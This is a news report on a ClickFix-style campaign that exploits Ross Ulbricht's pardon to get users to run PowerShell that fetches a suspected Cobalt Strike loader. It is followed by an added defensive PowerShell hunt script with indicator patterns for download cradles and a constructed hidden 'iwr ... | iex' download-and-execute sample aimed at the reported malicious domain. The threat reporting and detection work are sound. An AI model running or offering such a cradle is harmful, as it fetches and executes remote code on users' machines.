Ross Ulbricht, the controversial creator of the Silk Road, has long been at the heart of debates about the intersection of technology and criminal activity. Following a full pardon from US President Donald Trump, a new wave of cybercrime has emerged, leveraging news of Ulbricht’s case to deliver malware to unsuspecting targets.
Exploiting the news surrounding him, threat actors on X are redirecting users to a Telegram channel where they are duped into running PowerShell scripts that infect their devices with malware.
Ross Ulbricht Malware Campaign
According to vx-underground researchers’ latest update, the attack uses a new variation of the popular “ClickFix” tactic, but with a twist. Rather than disguising itself as a common error fix, this version pretends to be a captcha or verification process required to join the channel.
In this case, cybercriminals are impersonating Ulbricht using fake but verified accounts on X to lure users to Telegram channels falsely claimed to be official. Once on Telegram, users encounter a fraudulent “Safeguard” identity verification process, which leads them to a mini app that generates a fake verification dialog and automatically copies a PowerShell command to their clipboard.
Users are then instructed to run the command via the Windows Run dialog. Executing the command triggers a chain of events: first it downloads a PowerShell script, which retrieves a ZIP file from http://openline[.]cyou. The ZIP file contains several files, including identity-helper.exe, suspected to be a Cobalt Strike loader, a tool frequently used by attackers for remote access and for launching ransomware or data theft campaigns.
The entire process is carefully worded to avoid detection.
Ross Ulbricht Released
This development comes after Ulbricht was pardoned and released this week after being imprisoned since 2013 for founding and operating the notorious dark web marketplace Silk Road.
Silk Road was an online marketplace on the Tor network that allowed people to trade illegal goods, such as narcotics. Ulbricht operated the site using the pseudonym “Dread Pirate Roberts.” The FBI arrested him in October 2013 and took the site offline.
In 2015, Ulbricht was found guilty of charges including drug distribution and money laundering. He received a life sentence without parole, and his appeals in 2017 and 2018 were denied.
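As an added defensive example that is not part of the original article, the following PowerShell hunt reads the Run dialog history that Explorer keeps in the RunMRU registry key and flags entries matching the chain described above. The indicator list is an assumption built from this article (the reported domain, the dropped file name and generic download-cradle markers), and the sample command at the end is constructed for illustration.

```powershell
# Added example (not from the article): hunt for ClickFix-style Run-dialog
# launches in the current user's Win+R history. Indicator patterns are an
# assumption drawn from the article plus generic download-cradle markers.
$Indicators = @(
    'openline\[?\.\]?cyou',                          # domain reported by vx-underground (fanged or defanged)
    'powershell(\.exe)?\s',                          # PowerShell launched from the Run box
    '\s-(e|ec|enc|encodedcommand)\s',                # encoded command switch
    'iwr|Invoke-WebRequest|DownloadString|DownloadFile|curl\s',  # download cradle
    'Expand-Archive|\.zip',                          # ZIP stage described in the article
    'identity-helper\.exe'                           # dropped loader name from the article
)

function Test-ClickFixCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Return the indicator patterns that match; an empty result means no hit.
    $hits = foreach ($pattern in $Indicators) {
        if ($CommandLine -match $pattern) { $pattern }
    }
    return @($hits)
}

function Get-RunMruHistory {
    # RunMRU stores each Run-dialog entry as a lettered value whose data ends
    # in '\1'; the MRUList value gives the most-recent-first order.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return @() }
    $props = Get-ItemProperty -Path $key
    $order = if ($props.MRUList) { $props.MRUList.ToCharArray() } else { @() }
    foreach ($letter in $order) {
        $raw = $props.PSObject.Properties[[string]$letter].Value
        if ($raw) { [string]$raw -replace '\\1$', '' }
    }
}

# Live hunt: report every Run-dialog entry that matches at least one indicator.
foreach ($cmd in Get-RunMruHistory) {
    $hits = @(Test-ClickFixCommand -CommandLine $cmd)
    if ($hits.Count -gt 0) {
        [pscustomobject]@{ Command = $cmd; Indicators = ($hits -join ', ') }
    }
}

# Constructed sample (not a captured command) so the check can be exercised
# on a clean machine; it should match the domain, PowerShell and cradle patterns.
Test-ClickFixCommand -CommandLine 'powershell -w hidden -c "iwr http://openline[.]cyou/stage.ps1 | iex"'
```

Because RunMRU is per user, run the hunt in each user's context or load the corresponding NTUSER.DAT hive; pairing it with Security event 4688 or Sysmon event 1 records where explorer.exe is the parent of powershell.exe gives the same signal on hosts where the history has been cleared.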